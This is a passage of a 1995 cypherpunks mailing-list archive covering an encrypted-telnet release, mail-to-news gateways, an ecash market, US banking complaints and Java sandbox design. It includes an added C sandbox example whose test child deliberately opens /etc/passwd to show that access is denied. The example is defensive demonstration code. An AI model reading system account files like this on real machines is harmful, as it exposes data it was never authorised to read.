31kHa6n6rCzyrfdxN7NnZ/3MJh0bY+kK2hh2YK0tPjcT9o9ab/8OIp8XyukvdFbx
N4QYIxIBgXw=
=gwXi
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"This year or next, for the first time since the end of World War II,
we will spend more for interest payments on the debt than on defense.
Quite a stunning thing."  --  President  Bill Clinton
"I'm sure as hell stunned!"  --  citizen Jim Ray
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBrnySoZzwIn1bdtAQFXLAGAqpniQwKB+kSjyyzJYmppOE2nKv69k3QK
ZdENdZKGTq2wxEiqAyAMCb4qStYeXUCP
=v2Yv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sun, 30 Jul 95 00:13:50 PDT
To: Flame Remailer <remailer@flame.alias.net>
Subject: Re: Encrypted Telnet
In-Reply-To: <199507300601.IAA24503@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9507300038.B388-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Flame Remailer wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Announcing CryptoTCP beta version 0.9
> 
> CTCP is a public domain software package to do encrypted TCP sessions on
> unix systems.  It features Diffie-Hellman key exchange with triple-DES
> encryption.  This initial release is to be considered a beta version.
> Bug reports or comments on security issues are invited.
> 
> Features:
> 
>  - May be installed by any user on the system and does not require root
>    privileges.
> 
>  - Server can protect all TCP-based services (mail, news, web, etc.)
> 
>  - Includes a secure telnet client.
> 
>  - A random key is chosen for each session, so sessions can not be
>    decrypted later or replayed.
> 
>  - Source code is available and in the public domain.

Oh, thanks a lot - tell us everything except where to get it...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Sat, 29 Jul 95 22:16:49 PDT
To: cypherpunks@toad.com
Subject: Re: Mail2news Gates
In-Reply-To: <4f6_9507291907@gigo.com>
Message-ID: <m0scQWD-000v3HC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


John Erland wrote:
> I hope he does it fairly frequently, as these gates seem to have a
> half-life of about fifteen minutes.  @news.demon.co.uk was one of the
> old standbys that seemed to be stable, but it appears to have locked
> us all out now.

I usually test them about once a month or so.  Time to do an update I
guess...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Flame Remailer <remailer@flame.alias.net>
Date: Sat, 29 Jul 95 23:01:19 PDT
To: cypherpunks@toad.com
Subject: Encrypted Telnet
Message-ID: <199507300601.IAA24503@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Announcing CryptoTCP beta version 0.9

CTCP is a public domain software package to do encrypted TCP sessions on
unix systems.  It features Diffie-Hellman key exchange with triple-DES
encryption.  This initial release is to be considered a beta version.
Bug reports or comments on security issues are invited.

Features:

 - May be installed by any user on the system and does not require root
   privileges.

 - Server can protect all TCP-based services (mail, news, web, etc.)

 - Includes a secure telnet client.

 - A random key is chosen for each session, so sessions can not be
   decrypted later or replayed.

 - Source code is available and in the public domain.

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.71828

mQCNAjAalD0AAAEEAMBUTOJHpIlIkK+bHYlOvt36k6szaJE9QgygMmtTlWKpDRZA
aKT4LaFKdB9trS5zUCBan55Gg+3Yj0MItwoS+8B+x9IpCizFsaymOhpt75a59kFY
935ozxxAs6GCziXb1BiCDz07OVE5X10QCa8lz9ZvDrt0X1iLk/32LDYerV6NAAUT
tCBNYXVkZSBYIDxhbHQuYW5vbnltb3VzLm1lc3NhZ2VzPg==
=WP49
- -----END PGP PUBLIC KEY BLOCK-----

Detached signature for ctcp.0.9.tar:

- -----BEGIN PGP MESSAGE-----
Version: 2.71828

iQCVAgUAMBqiPf32LDYerV6NAQHUoAP/RLU0mM3ydxC9vjzay8hR5Qmb5zupHyCO
klW8IYjxIt14jnBTqkVM7q+mnaAWK2Ishppe14H5K6MAn/VOe2o5Hf61wAzJuxzw
wywiA9ZOdb+2cxm86YMgdbrnv430BCbSjPITV5PHyorovSqhX4RLLB1R8oOX4WUB
5WwzgLyV6Kc=
=ltvK
- -----END PGP MESSAGE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.71828

iQCVAgUBMBqp7f32LDYerV6NAQHBhAP9FTq0XIlPOcd5EqtAEQISFQkZ2ISZCwQi
u4Kfpfp8xv435dBVO22Awc1R8FxgsWab7x/98CTMkKtTCtz5P30xVECfrYJP4aDF
aTEZTdBQZzx/NsozqmdhZSh7uuuS5h4IQCZWwG+dgexFZzgXYdw7+e/IIoJfo2pZ
bk5/Y1u3HGI=
=d5iJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Sun, 30 Jul 95 07:59:45 PDT
To: usura@replay.com
Subject: You asked for it...4/5
In-Reply-To: <199507301435.AA26950@xs1.xs4all.nl>
Message-ID: <199507301454.AA08932@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Alex de Joode <usura@replay.com>
   Date: Sun, 30 Jul 1995 16:35:41 +0200 (MET DST)
   Organization: Replay and Company UnLimited.
   X-Reposting-Policy: ReDistribute Only with Permission
   X-Pgp-Key-Id: 0x8d56913d
   X-Mailer: ELM [version 2.4 PL21]
   Content-Type: text
   Content-Length: 122       
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   I did only receive picture number 4, the others never showed up.

   --
   Alex de Joode
   Fear Uncertainty and Doubt, Inc.				


It's probably because of the memory problems that toad's mail computer
has been having. It might get through if you ask the person to mail
it to you directly instead of to the list.

(P.S.: If toad isn't having memory problems, please, no one correct me. ;-)

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 30 Jul 95 07:14:34 PDT
To: cypherpunks@toad.com
Subject: SIN_not
Message-ID: <199507301414.KAA07174@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-30-95. NYPaper:


   "His Terrible Swift Sword: Thomas Sowell takes the shortest
   way with left-liberal elites." [Book Review]

      His stated mission is to attack and destroy the dominant
      intellectual elites of modern America: those liberal and
      left-wing intellectuals whose disproportionate control
      over the American psyche he believes responsible for the
      drift, stagnation and disquiet of our times. The
      anointed, as he dubs them with ill-concealed derision,
      have the right degrees and clubby credentials, but their
      false sense of noblesse oblige and their inordinate
      faith in their own intelligence and probity blind them
      to the cautious, decentralized and incremental logic of
      markets. In consequence, they unwisely embrace huge
      government interventions to end a set of social "crises"
      that never existed. They have expanded civil liability
      beyond recognition. They have led the civil rights
      movement away from equal opportunity and individual
      merit into the bottomless pit of affirmative action and
      minority set-asides. They have wrecked the criminal
      justice system and have licensed judges to stray from
      judicial restraint into the lawless world of judicial
      activism.                                      NIF_pig


   "N.R.A. Criticized for Aggressive Tactics: Against the
   A.T.F."

      The National Rifle Association has entered an aggressive
      new phase in its long and contentious relationship with
      the Bureau of Alcohol, Tobacco and Firearms. Opponents
      of the N.R.A., as well as some of its longtime
      supporters, say some of the organization's tactics have
      crossed ethical boundaries and may well have backfired,
      reinforcing an image of the group as dominated by
      right-wing zealots.                            NAW_leg


   Duet:  SIN_not






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sun, 30 Jul 95 09:11:27 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted Telnet
In-Reply-To: <199507300601.IAA24503@utopia.hacktic.nl>
Message-ID: <950730.110035.8D0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, remailer@flame.alias.net writes:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Announcing CryptoTCP beta version 0.9

Looks fun.  Any chance of a pointer to where to find it?
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMBus0Bvikii9febJAQHVHQQAkvFmTeUttqQTQHmlS+/7G8Kb6jigfLFT
8pcT0rnkDDuRPD902F7xRLO+5OPQaM19w1Z7rY8jcaKW/01pTkqISfpCTyWsF6F5
MRO3CKMDMuy9Y7QTYh4E7115tf7rkkfm40anM34RJ2ZXrEsEUL9erJaV4aA5DigT
ldA4MQQI3PY=
=kjrb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nsb@nsb.fv.com
Date: Sun, 30 Jul 95 11:25:36 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmermann legal fund
Message-ID: <9507301823.AB20787@ nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


>Nathaniel Borenstein <nsb@nsb.fv.com> writes on cpunks:
>The URL being used is http://www.netresponse.com/zldf, and nowhere
>does it mention using PGP and CC #'s.  Most people who can't use PGP
>aren't going to be interested I would have thought.  

Actually, I think you're wrong on that score.  I've met quite a few people
who understand the importance of the principles involved, and who support
Phil's cause wholeheartedly, but who have never even tried to learn PGP
(never felt the need, I guess).

However, I agree that the pages should at least contain a link to the other
ZLDF site, which mentions how to use PGP and credit card numbers.

>Okay, now separate issue, really talking about FV now.  For me, the
>main thing holding me back from using it is that I'm not in the US,
>and don't have a US bank account to open a FV seller acct.  (I would
>have liked to use it as one of the few net payment systems actually up
>and running, as a payment method for the RSA T-shirts, it would have
>been a nice system, allowing me to effectively accept VISA payments
>which I have otherwise been unable to do.)
>
>Any news on this front?  Last I looked on your WWW page, you were
>investigating this and payments in other currencies.  US$ would be
>fine though, as long as it was possible for the seller to create a US
>account, or have it paid to a non-US account (would it not be possible
>to pay to non-US account?).

Of course it's possible, and it's definitely something we intend to do
*eventually*.  The real question is how hard it is, and how high-priority
it is.  We're trying to do a zillion things at once, as you can imagine. 
To pay into non-US accounts, we need to establish banking relationships in
other venues.  For the most part, we need to do it one country at a time,
which is awesomely time-consuming (although there may be some shortcuts,
e.g. to do all of Europe at once).

However, it is worth noting that we DO have non-US sellers already. 
Remember, the requirement is not that you be in the US, but rather that you
have an account in a US bank.  This is not all that hard for a non-US
citizen to do **IF** you can show up physically at a US bank.  Thus, if
there's a US bank that has an office near you, you can walk in and open an
account to which deposits can be made through the US direct-deposit system,
and  you're in business with FV.

What we'd really hoped to have up and running by now, as a short-term
expedient, was an expedited mechanism whereby non-US people could open
accounts at a US bank by mail, without the physical presence.  This turns
out to be contrary to a lot of established procedures in the US banking
world, so we're still looking for a bank that's willing to set up this kind
of expedited procedure for account setup.  If and when we get that working,
we will certainly be announcing the availability of that service on
fv-users and similar venues.  (I probably won't announce it on cypherpunks,
since I think many people already think FV is too-much-discussed here.  My
intent with FV on cypherpunks is to only talk about FV in contexts where it
is directly relevant, in particular when other people bring it up.)  --
Nathaniel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 30 Jul 95 15:24:37 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmermann legal fund
Message-ID: <199507302224.PAA10093@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:23 PM 7/30/95 EDT, nsb@nsb.fv.com wrote:
> However, it is worth noting that we DO have non-US sellers already. 
> Remember, the requirement is not that you be in the US, but rather that you
> have an account in a US bank.  This is not all that hard for a non-US
> citizen to do **IF** you can show up physically at a US bank.

Many years ago I obtained a US account by mail
from overseas, using cheques made out to me from 
US sources.

I did this with the bank of America.  No big problem.  But as
time went by, their ability to handle financial events that were
out of the ordinary deteriorated spectacularly.

Perhaps this is partly because things tightened up, but
it is also that most US banks have developed a monolithic 
and obstructionist bureaucracy that is incapable of handling 
any event that is out of the ordinary.

> What we'd really hoped to have up and running by now, as a short-term
> expedient, was an expedited mechanism whereby non-US people could open
> accounts at a US bank by mail, without the physical presence.  This turns
> out to be contrary to a lot of established procedures in the US banking
> world,

By and large, over the past twenty years, there has been a 
decisive move towards financial management by guys who could 
not find their ass with both hands.


US banks simply do not work well for international transactions.

The problem is not so much money laundering laws as intolerable
ignorance, provincialism, and incompetence.

If you insist that international transactions be mediated through 
US banks, you are cutting your throat.

Go look for banks that are truly international.  You will not
find them in America.





 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Sun, 30 Jul 95 08:24:50 PDT
To: cypherpunks@toad.com
Subject: Experimental Ecash Market
Message-ID: <Pine.3.89.9507301603.A1445-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



For those who want to buy and sell ecash for real cash, there's now an
experimental Ecash Market WWW page at :

http://www.c2.org/~mark/ecash/ecash.html

You can submit an offer to add to the lists of buyers and sellers for free
(though if people start submitting fake offers I may charge for it in
future), or buy the email address of a buyer or seller for c$ 0.50.  Since
I'm still in the process of finishing off the software, the site may go up
and down, or simply get dodgy, over the next few weeks. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 30 Jul 95 07:35:32 PDT
To: cypherpunks@toad.com
Subject: Re: You asked for it...4/5
Message-ID: <199507301435.AA26950@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text



I did only receive picture number 4, the others never showed up.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uSuRa <usura@utopia.hacktic.nl>
Date: Sun, 30 Jul 95 07:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypted Telnet
Message-ID: <199507301453.QAA00526@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp sez:

: On Sun, 30 Jul 1995, Flame Remailer wrote:
:
: > Announcing CryptoTCP beta version 0.9

[..]

: Oh, thanks a lot - tell us everything except where to get it...


ftp://utopia.hacktic.nl/pub/crypto/

--
Alex de Joode
Fear, Uncertainty and Doubt, Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dani.goldenholz@vircomm.com (Dani Goldenholz)
Date: Sun, 30 Jul 95 09:33:24 PDT
To: E.J.Koops@kub.nl
Subject: Re: Crypto Law Survey
Message-ID: <1775103966.462267@vircomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks man!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdf@gigo.com (John Erland)
Date: Sun, 30 Jul 95 17:34:07 PDT
To: cypherpunks@toad.com
Subject: Another Newsgate Dies
Message-ID: <726_9507301723@gigo.com>
MIME-Version: 1.0
Content-Type: text/plain



Looks like mail2news@bham.ac.uk is also dead now (wait, isn't the utexas
gate _also_ dead, or was it so problematic that it was not advised?):

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=++=+=+=+=+=+=+

* Originally from news2mail@sun4.bham.ac.uk (1:203/2) to John Erland.
* Original dated: Jul 30 '95, 04:05

This reply has been automatically generated by the mail-to-news system.
Your message was not posted to Usenet because this facility has been
withdrawn.

Use a different mail-to-news gateway, such as the one at cs.utexas.edu
(mail news-group-name@cs.utexas.edu).

The text of your rejected message is below...

----
--
: Fidonet:  John Erland 1:203/8055.12  .. speaking for only myself.
: Internet: kdf@gigo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Crypto Defender <crypto@shaq.midex.com>
Date: Sun, 30 Jul 95 09:36:24 PDT
To: "Rev. Mark Grant" <mark@unicorn.com>
Subject: Re: Experimental Ecash Market
In-Reply-To: <Pine.3.89.9507301603.A1445-0100000@unicorn.com>
Message-ID: <Pine.3.89.9507301737.A10422-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark,

Let me know if you need any help with the page.  I am willing and able to 
set up a similar server at my site here at Midex.  I need to get up and 
going with the various ecash software.  Is there a comprehensive list or 
pointers out there to be had?

Matt

On Sun, 30 Jul 1995, Rev. Mark Grant wrote:

> 
> For those who want to buy and sell ecash for real cash, there's now an
> experimental Ecash Market WWW page at :
> 
> http://www.c2.org/~mark/ecash/ecash.html
> 
> You can submit an offer to add to the lists of buyers and sellers for free
> (though if people start submitting fake offers I may charge for it in
> future), or buy the email address of a buyer or seller for c$ 0.50.  Since
> I'm still in the process of finishing off the software, the site may go up
> and down, or simply get dodgy, over the next few weeks. 
> 
> 	Mark
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sun, 30 Jul 95 17:16:24 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Zimmermann legal fund
In-Reply-To: <199507302305.TAA16631@bb.hks.net>
Message-ID: <Pine.3.89.9507301717.E26667-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, Lucky Green wrote:

> Six years ago, you could walk into a Bank, show them your driver license,
> and open an  account.
> Today, you need several pieces of ID.
> Three years ago, you could withdraw money from your own account without
> having  your checkbook on you.
> Today, they make you pay for a "counter check".
> One year ago, you could walk into a bank and cash a check drawn onto an
> account at the very same bank.
> Today (Coast Federal), they make you pay a $10 check cashing fee.

When I lived in California, I banked at Security Pacific, then changed
over my account to BofA.  When I left the bay area, I closed my account,
not knowing that someone had sat on a check for $120 - I thought it was me
just entering an ATM receipt twice (as I do from time to time).  So,
someone from a place called ChexSystems sends me a letter, saying "well,
you had a check go through and the bank paid it, please pay us."  So, I
send them the $120 or whatever it was. 

When I tried to open a checking account in Utah, I find that I can't, for
the sole reason that I had been "reported to ChexSystems".  I explained
the situation to no avail.  BofA refuses to remove the charge, saying that
it's "against their policy".  ChexSystems refuses to do anything about it,
saying that "it was a valid debt", one which I neither knew about nor
agreed to.  If the bank would've mailed me a letter, saying that they
bounced the check, or paid it and please remit, I would've been happy to. 
Instead, they chose to try and screw me over by reporting the so-called
"debt" to some sort of check reporting system.  From my point of view, the
action by the bank was malicious and done with the intent of causing me
harm.  I don't recommend anyone doing business with BofA for this reason,
and I strongly urge that people immediately close their accounts with BofA,
refuse to do business with them, and switch to another bank which refuses
to participate in such malicious practices. 

I'm *not* impressed.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 30 Jul 95 15:09:33 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Military Prisons for Citizen-Units
In-Reply-To: <ac3f32b004021004c868@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950730180306.12610A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jul 1995, Timothy C. May wrote:

> At 5:42 PM 7/28/95, Brian Davis wrote:
> >The military is not authorized to listen in to any phone calls they want
> >to hear.  Otherwise, everyone on the list, including me, would probably
> >be in some hidden military prison.
> >
> >:-)  for the humor-impaired.
> 
> This is not so.
> 
> The military _did_ put me in one of their hidden military prisons, but
> decided I would be more useful on the Cypherpunks list. I recognize several
> other names here from my work brigade.
> 
> --Citizen-Unit Tim "The Zek" May
> 

I said nothing about co-opting formerly free spirits for undercover 
duty.  Having outed yourself, you have subjected yourself to termination.
After all the government has done for you  ...  a pity.  But a good 
example to the "others."

Darth Vader




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Sun, 30 Jul 95 15:05:37 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Java, Netscape, OpenDoc, and Babel
In-Reply-To: <199507282003.AA24860@tyrell.net>
Message-ID: <199507302205.SAA20751@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Fraering writes:
> How would you make Java secure or create a secure Javalike language?
> (Secure to your satisfaction, of course).

Well, you can't make anything secure, but you can make things more
secure.

My fundamental design principles are:

1) You can't abuse features you don't have.
2) You can't abuse privs you don't have.
3) You can't catastrophically fail to do something you don't do.

I would eliminate the notion of having the Java interpreter make the
system "safe" with language features that cripple certain threads of
execution. Instead, I'd emasculate the whole system. Remove any i/o
features right out of the interpreter -- ditto execution features or
other features. I'd run the interpreter in a separate unix process
communicating only through two pipes, one down which you feed code and
mouse events and one up which you get bitmaps and URLs to fetch. The
interpreter runs in a padded cell and can't alter the world except by
passing up bitmaps and URLs. It doesn't talk to anything other than
the browser.

Even then, I'm not entirely comfortable, but I'm more comfortable.

> What sort of interface does it have to the filesystem? I would guess that
> a secure language would have its own filesystem mapped to a file of fixed
> size in the normal filesystem, so that it couldn't cause disaster by
> filling your hard disk.

That's not a secure system, because you depend on the interpreter
properly doing the mapping. If there are no system calls to open(2) in
the whole program it can't misuse any of those calls. If there are no
calls to exec, it can't mis-execute things. Security through emasculation.

Perry
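
The two-pipe "padded cell" described in the message above, as an added example (not code from the original message or from any Java implementation). The names `cell_main` and `run_cell`, the CLICK/URL/BITMAP line format and the use of `RLIMIT_NOFILE` are assumptions of this example; the message itself relies on the interpreter simply containing no I/O calls, while the limit here additionally makes open(2) fail if such a call slips in.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

struct cell_result {
    int probe_denied;     /* 1 if open(2) failed inside the cell */
    int accepted;         /* replies of a kind the browser side acts on */
    int rejected;         /* replies of any other kind, dropped */
    char first_url[128];  /* first URL the cell asked the browser to fetch */
};

/* Child side. Hypothetical stand-in for the interpreter: turns "CLICK <name>"
 * into a URL request, and misbehaves on purpose so the limits are exercised. */
static void cell_main(int in, int out)
{
    char req[256], msg[512];
    ssize_t n = read(in, req, sizeof req - 1);
    if (n <= 0)
        _exit(2);
    req[n] = '\0';
    req[strcspn(req, "\n")] = '\0';
    int fd = open("/etc/passwd", O_RDONLY);   /* probe: reach for the filesystem */
    int len = snprintf(msg, sizeof msg,
                       "URL http://example.invalid/%s\nOPEN /etc/passwd\n",
                       strncmp(req, "CLICK ", 6) == 0 ? req + 6 : "");
    if (write(out, msg, (size_t)len) != (ssize_t)len)
        _exit(2);
    _exit(fd < 0 ? 0 : 42);                   /* exit status reports the probe */
}

/* Parent ("browser") side: build the cell, feed one event down, read replies up. */
int run_cell(const char *event, struct cell_result *r)
{
    int down[2], up[2], status;
    char buf[1024];
    size_t used = 0;
    ssize_t n;

    memset(r, 0, sizeof *r);
    signal(SIGPIPE, SIG_IGN);                 /* a dead cell must not kill the browser */
    if (pipe(down) < 0) return -1;
    if (pipe(up) < 0) {
        close(down[0]); close(down[1]);
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0) {
        close(down[0]); close(down[1]); close(up[0]); close(up[1]);
        return -1;
    }
    if (pid == 0) {
        /* Keep only the two pipe ends. The 4096 bound is a constructed value;
         * closefrom()/close_range() is the better tool where it exists. */
        for (int fd = 0; fd < 4096; fd++)
            if (fd != down[0] && fd != up[1])
                close(fd);
        /* Limit of 0 descriptors: no new file, socket or pipe can be opened.
         * This does not stop exec; that still relies on the code having none. */
        struct rlimit none = { 0, 0 };
        if (setrlimit(RLIMIT_NOFILE, &none) < 0)
            _exit(3);
        cell_main(down[0], up[1]);
        _exit(2);                             /* not reached */
    }
    close(down[0]); close(up[1]);
    if (write(down[1], event, strlen(event)) < 0) { /* cell already gone */ }
    close(down[1]);
    while (used < sizeof buf - 1 &&
           (n = read(up[0], buf + used, sizeof buf - 1 - used)) > 0)
        used += (size_t)n;
    buf[used] = '\0';
    close(up[0]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    r->probe_denied = WIFEXITED(status) && WEXITSTATUS(status) == 0;
    /* The browser decides what a reply may cause: only the two kinds pass. */
    for (char *line = strtok(buf, "\n"); line; line = strtok(NULL, "\n")) {
        if (strncmp(line, "URL ", 4) == 0 || strncmp(line, "BITMAP ", 7) == 0) {
            r->accepted++;
            if (line[0] == 'U' && r->first_url[0] == '\0')
                snprintf(r->first_url, sizeof r->first_url, "%s", line + 4);
        } else {
            r->rejected++;
        }
    }
    return 0;
}

int main(void)
{
    struct cell_result r;
    if (run_cell("CLICK logo\n", &r) != 0) return 1;
    printf("denied=%d ok=%d dropped=%d url=%s\n", r.probe_denied, r.accepted, r.rejected, r.first_url);
    return 0;
}
```

The child can still burn CPU and memory; the descriptor limit only removes its ways of touching anything other than the two pipes.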




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 30 Jul 95 16:08:35 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507302305.TAA16631@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507302224.PAA10093@blob.best.net>, jamesd@echeque.com
("James A. Donald") wrote:

>Many years ago I obtained a US account by mail
>from overseas, using cheques made out to me from 
>US sources.
>
>I did this with the bank of America.  No big problem.  But as
>time went by, their ability to handle financial events that were
>out of the ordinary deteriorated spectacularly.
>
>Perhaps this is partly because things tightened up, but
>it is also that most US banks have developed a monolithic 
>and obstructionist bureaucracy that is incapable of handling 
>any event that is out of the ordinary.

Six years ago, you could walk into a Bank, show them your driver license,
and open an  account.
Today, you need several pieces of ID.
Three years ago, you could withdraw money from your own account without
having  your checkbook on you.
Today, they make you pay for a "counter check".
One year ago, you could walk into a bank and cash a check drawn onto an
account at the very same bank.
Today (Coast Federal), they make you pay a $10 check cashing fee.

The US banking industry has gone to the dogs. The day a non-US bank offers
an account that can be accessed over the net will be the day I close my US
accounts.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBwQDCoZzwIn1bdtAQGqHQF8C1QShMuN0Eq74mMI5rculIym8xjzYV8C
mErjtB8tJ7UseKD9bmNY6dpWqBviplMp
=aBGi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: QLDM75A@prodigy.com (MR ELDON B JENKINS)
Date: Sun, 30 Jul 95 17:05:16 PDT
To: cypherpunks@toad.com
Subject: C'punks at DefCon
Message-ID: <013.09272796.QLDM75A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


> Are any of us cpunks having a gathering at Defcon?  (besides the 
> one

Well, a couple other c'punks have mailed me to determine a time and a
place.  It looks like everyone wants to meet in the lobby of the
Tropicana sometime Friday before Hacker Jeopardy.  Nobody has stated
a concrete time yet so I guess we'll all just wander through the
lobby every now and then.  Any suggestions on a time?

Eldon Jenkins





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Sun, 30 Jul 95 17:58:02 PDT
To: dccp@eff.org
Subject: PRZ Interview in Infobahn Magazine
Message-ID: <Pine.ULT.3.91.950730205110.15049H-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



I generally try to avoid buying anything with the word "Infobahn" on it,
but in the premiere issue of this new magazine there's a 5-page article
about Phil Zimmermann written by Jeff Elliot (of the National Review...but
it's a good article anyway ;).  It's pretty good--if anyone is new to the
ongoing Zimmermann drama it's a good sum-up. 

-=Kathleen M. Ellis=-

(This message also serves as a test for the new DC-Cypherpunks list server.)

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
